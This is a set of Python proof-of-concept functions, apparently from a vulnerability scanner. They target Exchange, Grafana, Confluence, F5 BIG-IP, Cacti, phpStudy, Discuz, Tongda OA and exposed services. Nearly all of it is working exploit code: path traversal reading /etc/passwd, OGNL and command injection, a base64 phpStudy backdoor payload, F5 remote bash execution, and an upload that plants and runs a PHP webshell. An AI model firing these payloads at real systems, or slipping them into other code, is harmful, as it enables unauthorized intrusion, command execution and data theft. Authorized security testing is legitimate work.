def poc(url): if not url.startswith("http"): url = "https://" + url url = get_standard_url(url) try: r1 = request.get(url + "/owa", timeout=5, verify=False, allow_redirects=False) # print(r1.text) if r1.status_code != 200: return False r2 = request.get( url + "/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]", timeout=5, verify=False, allow_redirects=False) if r2.status_code == 200 and "Exchange" in r2.text: return True except Exception as e: # print(e) pass return False
def poc(url): url = get_standard_url(url) try: r = request.get(f"{url}/current_config/passwd", timeout=10) if r.status_code == 200 and "name:passwd" in r.text: return True except: pass return False
def poc(url): url = get_standard_url(url) url = url + "/debug.php" try: r = request.get(url, timeout=5) if r.status_code == 200: return True except: pass return False
def poc(url): base = get_standard_url(url) vuln_url = f"{base}/mgmt/shared/authn/login" try: r = request.get(vuln_url, verify=False, timeout=5) json.loads(r.text) if "resterrorresponse" in r.text or "message" in r.text: return vuln_url except: pass return False
def poc(url): url = get_standard_url(url) path = url + "/graph_realtime.php?action=init" try: # print(path) req = request.get(path, timeout=5) if req.status_code == 200 and "poller_realtime.php" in req.text: return True else: return False except: return False
def poc(url): try: url = get_standard_url(url) url = url + "/pages/doenterpagevariables.action" paramsPost = { "queryString": "aaa\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022]}+\\u0027bbb"} headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0", "Content-Type": "application/x-www-form-urlencoded"} response = requests.post(url, data=paramsPost, headers=headers, timeout=5) if "aaa{class java.lang.String=null}bbb" in response.text: return True except: pass return False
def poc(url): headers = { 'Content-Type': 'application/x-www-form-urlencoded', } target = get_standard_url(url) url = target + url_payload try: res = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False) if res.status_code == 200: url2 = target + "/secquan.php" res2 = request.get(url2, headers=headers, timeout=5, allow_redirects=False, verify=False) if "bug exist" in res2.text: return target + "/secquan.php" except: pass return False
def poc(url): plugins = [ "cloudwatch", "dashlist", "elasticsearch", "graph", "graphite", "heatmap", "influxdb", "mysql", "opentsdb", "pluginlist", "postgres", "prometheus", "stackdriver", "table", "text" ] base = get_standard_url(url) for plugin in plugins: vuln_url = f"{base}/public/plugins/{plugin}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd" try: r = request.get(vuln_url, verify=False, timeout=5) if r.status_code == 200 and "root:x:" in r.text: return vuln_url except: pass return False
def poc(url): url = get_standard_url(url) url = url + "/forum.php" try: r = request.get(url, timeout=5) tmp = re.split(" |=|,", r.headers['Set-Cookie']) field = [i for i in tmp if "language" in i] if not field: return False # print(f"{url}:{field}") cookie = {field[0]: "'.phpinfo().'"} r = request.get(url, cookies=cookie, timeout=5) if "PHP Version" in r.text: return True except: return False
def poc(url): if not url.startswith("http"): url = "https://" + url url = get_standard_url(url) try: vul_url = url + "/owa/auth/x.js" headers = { 'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;' } resp = request.get(vul_url, headers=headers, timeout=5, verify=False) if resp.status_code == 500 and 'NegotiateSecurityContext' in resp.text: return url except Exception as e: pass return False
def poc(url): head = { 'Accept-Encoding': 'gzip,deflate', 'Accept-Charset': 'c3lzdGVtKCdlY2hvIHBocHN0dWR5X2JhY2tkb29yX2ZsYWcnKTs=' } target = get_standard_url(url) try: res = request.get(url=target, headers=head, timeout=5, allow_redirects=False) if res.status_code == 200 and res.text.startswith( "phpstudy_backdoor_flag"): return url except: pass return False
def poc(url): if not url.startswith("http"): url = "https://" + url url = get_standard_url(url) vuln_url = url + '/webadm/?q=moni_detail.do&action=gragh' headers = {"Content-Type": "application/x-www-form-urlencoded"} data = "type='|cat /etc/passwd||'" try: response1 = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) if response1.status_code == 200 and 'root:x:0:0' in response1.text: return True except Exception as e: pass return False
def poc(url): headers = { 'Content-Type': 'application/x-www-form-urlencoded', } target = get_standard_url(url) for url_payload in (url_payload1, url_payload2, url_payload3, url_payload4): url = target + url_payload for data_payload in (data_payload1, data_payload2, data_payload3): try: res = request.post(url, data=data_payload, headers=headers, timeout=5, allow_redirects=False) if res.status_code == 200 and ";</script>" not in res.text\ and "Login.jsp" not in res.text and "Error" not in res.text: return url + "\tpayload:" + data_payload except: pass return False
def poc(url): headers = { 'Content-Type': 'application/x-www-form-urlencoded', } target = get_standard_url(url) url = target + url_payload for payload in (payload1, payload2): try: res = request.post(url, data=payload, headers=headers, timeout=5, allow_redirects=False) if "系统提醒工作流" in res.text and "403" not in res.text: if "@@version" in payload: return target + "\tmssql" else: return target + "\toracle" except: pass return False
def poc(host, ports=[]): host = get_standard_url(host) hosts = url2ip(host) result = [] threads = [] for host in hosts: if ports: args = (host, result, ports) else: args = ( host, result, ) poc_list = ['redis', 'mongo', 'genkins', 'memcached', 'jboss', 'zookeeper', 'rsync', 'couchdb', \ 'elasticsearch', 'hadoop', 'jupyter', 'docker', 'ftp'] for p in poc_list: threads.append(threading.Thread(target=globals()[p], args=args)) for t in threads: t.start() for t in threads: t.join() return result
def poc(url): url = get_standard_url(url) path = url + "/mgmt/tm/util/bash" headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0', 'Content-Type': 'application/json', 'X-F5-Auth-Token': '', 'Authorization': 'Basic YWRtaW46QVNhc1M=' } data = json.dumps({'command': 'run', 'utilCmdArgs': '-c id'}) try: r = request.post(url=path, data=data, headers=headers, verify=False, timeout=5) if r.status_code == 200 and 'commandResult' in r.text: return True except Exception as e: print(e) return False
def poc(url): url = get_standard_url(url) attack = attack_yapi(url) s = requests.Session() return attack.verify_yapi(s)
def poc(url): try: url1 = get_standard_url(url) + '/ispirit/im/upload.php' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668" } data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" result = request.post(url1, headers=headers, data=data, timeout=5, verify=False) name = "".join(re.findall("2003_(.+?)\|", result.text)) url2 = get_standard_url(url) + '/ispirit/interface/gateway.php' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded" } data = { "json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "echo fffhhh" } result = request.post(url2, headers=headers, data=data, timeout=5, verify=False) if result.status_code == 200 and 'fffhhh' in result.text: # print("[+] Remote code execution vulnerability exists at the target address") return get_standard_url(url) else: return False except: pass